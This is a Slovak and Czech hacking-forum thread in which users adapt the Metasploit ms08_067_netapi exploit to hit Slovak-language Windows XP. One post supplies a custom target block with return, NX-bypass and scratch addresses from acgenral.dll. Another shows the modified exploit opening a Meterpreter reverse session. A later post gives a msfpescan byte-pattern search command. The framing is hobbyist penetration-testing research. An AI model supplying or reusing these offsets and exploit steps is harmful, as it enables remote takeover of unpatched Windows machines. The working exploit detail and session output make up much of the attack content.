Exploitacia slovenského Windows XP exploitom ms08_067

DDos útoky, crack hesla, OllyDbg, rAdmin, Metasploit, penetrační testy, ladění, Backtrack, Wifiway, Ubuntu, DVL, Nesus, Maltego a další..
Odpovědět
Uživatelský avatar
Buli
Příspěvky: 2
Registrován: 11 zář 2009, 12:59

11 říj 2009, 15:30

Ahoj, viete poradiť ako rozbehat exploit ms08_067 tak aby rozoznal aj slovenský Windows XP? Vždy vypíše
Fingerprint: Windows XP Service Pack 2 - lang:Unknown
Vďaka.
Naposledy upravil(a) Buli dne 11 říj 2009, 15:32, celkem upraveno 1 x.

Uživatelský avatar
Michal
Level 7
Příspěvky: 242
Registrován: 19 kvě 2008, 20:14
Bydliště: Košice

11 říj 2009, 15:44

Buli rozbehávajú sa botasky pre maratónom nie exploit. Z toho mála usudzujem, že hľadáš:

Kód: Vybrat vše

info windows/smb/ms08_067_netapi
alebo

Kód: Vybrat vše

set TARGET číslo

Uživatelský avatar
Buli
Příspěvky: 2
Registrován: 11 zář 2009, 12:59

11 říj 2009, 15:56

Moja chyba. Nie rozbehať, ale upraviť. Exploit funguje bez problémov s XP-ckami okrem slovenských. Pri nich nerozozná jazykovú mutáciu a Exploit následne nevytvorí spojenie.
VERS: $Revision: 7053 $ HOST: 192.168.1.3 OS: Windows XP SP: Service Pack 2 FP: ecd80b001402000000800100e0010000a00100006a01000000c0010026010000 FP: e8000000c000000000800101760000003c0000001000000049006e0074006500 FP: 72006e00650074002000550052004c0020005000720069006e00740065007200 FP: 73000000570069006e0064006f007700730020004e005400200049006e007400 FP: 650072006e00650074002000500072006f007600690064006500720000005700 FP: 69006e0064006f007700730020004e005400200049006e007400650072006e00 FP: 6500740020005000720069006e00740069006e006700000056007a0064006900 FP: 61006c0065006e00e900200074006c0061000d016900610072006e0065000000 FP: 56007a006400690061006c0065006e00e900200074006c0061000d0169006100 FP: 72006e0065002000570069006e0064006f007700730020004e00540000004d00 FP: 6900630072006f0073006f00660074002000570069006e0064006f0077007300 FP: 20004e006500740077006f0072006b0000004c006f00630061006c006c007900 FP: 200063006f006e006e006500630074006500640020005000720069006e007400 FP: 6500720073000000570069006e0064006f007700730020004e00540020004c00 FP: 6f00630061006c0020005000720069006e0074002000500072006f0076006900 FP: 64006f0072000000570069006e0064006f007700730020004e00540020004c00 FP: 6f00630061006c0020005000720069006e007400650072007300000014020000 FP: 0300000000000000 TXT: Internet URL Printers TXT: Windows NT Internet Provider TXT: Windows NT Internet Printing TXT: Vzdialené tlačiarne TXT: Vzdialené tlačiarne Windows NT TXT: Microsoft Windows Network TXT: Locally connected Printers TXT: Windows NT Local Print Providor TXT: Windows NT Local Printers *** END FINGERPRINT [] Fingerprint: Windows XP Service Pack 2 - lang:Unknown [] Could not determine the exact language pack
[] Exploit completed, but no session was created.

Uživatelský avatar
Michal
Level 7
Příspěvky: 242
Registrován: 19 kvě 2008, 20:14
Bydliště: Košice

11 říj 2009, 16:30

Potrebuješ pravdepodobne upraviť resp. vytvoriť nanovo nasledovnú časť exploitu pre SK jazyk, tuším pomocou msfpescan :

Kód: Vybrat vše

# Metasploit's NX bypass for XP SP2/SP3
                                        [ 'Windows XP SP3 Czech (NX)',
                                                {
                                                        'Ret'       => 0x6fe1f807,
                                                        'DisableNX' => 0x6fe217c2,
                                                        'Scratch'   => 0x00020408
                                                }
V tele exploitu nájdeš krátke poznámky ako na to. Zameraj sa na riadky začínajúce *** WINDOWS XP SP2/SP3 TARGETS ***. Isto by to bola zaujímavá výzva, no pre operačný systém Windows XP už nemám miesto. Držím palec.
Prípadne sa zastav na IRC, môžeme na to pozrieť spolu.
Naposledy upravil(a) Michal dne 11 říj 2009, 17:13, celkem upraveno 1 x.

Uživatelský avatar
Michal
Level 7
Příspěvky: 242
Registrován: 19 kvě 2008, 20:14
Bydliště: Košice

11 říj 2009, 18:10

Ak som postupoval správne a analyzovaná knižnica acgenral.dll získaná na IRC kanáli pochádzala z XP SP2 SVK riešenie by malo byť nasledovné:

Kód: Vybrat vše

# Metasploit's NX bypass for XP SP2/SP3
                                        [ 'Windows XP SP2 Slovak (NX)',
                                                {
                                                        'Ret'              => 0x6f8abafb,
                                                        'DisableNX' => 0x6f8917c2,
                                                        'Scratch'       => 0x00020408
                                                }
                                        ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
Testujte, reportujte...

Edit: Úprava funguje!

Kód: Vybrat vše

msf exploit(ms08_067_netapiMod) > set TARGET 14
TARGET => 14
msf exploit(ms08_067_netapiMod) > exploit

[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.0.134:4444 -> 192.168.0.134:38389)

meterpreter > sysinfo
Computer: STARBUG-45E64AE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: sk_SK
Naposledy upravil(a) Michal dne 12 říj 2009, 15:08, celkem upraveno 1 x.

Uživatelský avatar
cocaine
Level 7
Příspěvky: 398
Registrován: 29 dub 2008, 23:54
Bydliště: Země Oz

14 říj 2009, 19:39

Díky za podrobností i článek na portálu.
Jednou deset minut a ušetříš hodiny

Uživatelský avatar
Michal
Level 7
Příspěvky: 242
Registrován: 19 kvě 2008, 20:14
Bydliště: Košice

14 říj 2009, 23:44

cocaine nie je zač. Celkom ma to tešilo. Hádam ešte zvládnem test ako sa zachová upravený exploit voči Windows XP SP3 SVK. Ďalší zaujímavý výskum pravdepodobne začne až sa spustí testovanie tohto exploitu voči Windows Vista SP0-SP1. Ak by sa niekomu chcelo trochu bádať test/úpravu pre Windows 2000, Windows 2003 SVK/CZ (SP0-SP2) tuším ešte nikto nerobil.

Uživatelský avatar
lukas22
Příspěvky: 2
Registrován: 21 úno 2013, 17:41

21 úno 2013, 17:43

Prosím vás funguje to aj na Windows XP SP3? Ďakujem.

Uživatelský avatar
wire
Level 8
Příspěvky: 696
Registrován: 15 kvě 2007, 22:44
Bydliště: Praha

22 úno 2013, 13:10

lukas22 proč to neprubneš?
Ve Fóru používáme diakritiku, než se ptáme čteme nápovědu a pravidla fóra!

Uživatelský avatar
lukas22
Příspěvky: 2
Registrován: 21 úno 2013, 17:41

01 bře 2013, 21:26

Prepáč.
Potrebujem pomoc.
Keď dám ./msfpescan -r “\x6A\x04\x8D\x45\x08\x50\x6A\x22\x6A\xFF” acgenral.dll nič mi nenajde.
Ale v návode im to najde http://airdump.cz/uprava-metasploit-exploitu-modul-slovensky-cesky-windows/.
Mne iba vypise :
[acgenral.dll]


a inak nič.
Ďakujem za pomoc.

Odpovědět
  • Podobná témata
    Odpovědi
    Zobrazení
    Poslední příspěvek
  • Informace
  • Kdo je online

    Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 1 host